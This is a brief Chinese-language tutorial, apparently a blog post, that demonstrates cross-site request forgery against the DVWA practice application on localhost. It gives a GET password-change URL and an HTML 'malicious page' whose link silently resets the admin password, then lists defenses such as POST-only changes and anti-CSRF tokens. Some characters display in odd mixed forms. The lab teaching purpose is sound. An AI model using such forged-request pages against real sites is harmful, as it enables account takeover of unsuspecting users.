您好,登錄后才能下訂單哦!
首先什么是CSRF:
如圖:
1,用戶通過瀏覽器正常訪問帶有CSRF漏洞的網(wǎng)站。
如我去訪問http://127.0.0.1:8080/DVWA/login.php
我們登錄進(jìn)去賬號(hào)是:admin 密碼是:password,找到一個(gè)修改密碼的地方
修改密碼為123456,修改的url是:
http://127.0.0.1:8080/DVWA/vulnerabilities/csrf/password_new=123456&password_conf=123456&Change=Change#
2,我們構(gòu)造惡意網(wǎng)站B將代碼保存為index.html
<html> <head> <title>這是惡意網(wǎng)頁</title> </head> <body> <h2>這是惡意網(wǎng)頁<h2> <a href="http://127.0.0.1:8080/DVWA/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#">***</a> </body> </html>
我們?cè)L問網(wǎng)站B:點(diǎn)擊***
我們可以看到密碼被改了(改成了password)
防御:
1.盡量使用POST,限制GET
2.瀏覽器Cookie策略
3.Anti CSRF Token
微信公眾號(hào):
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。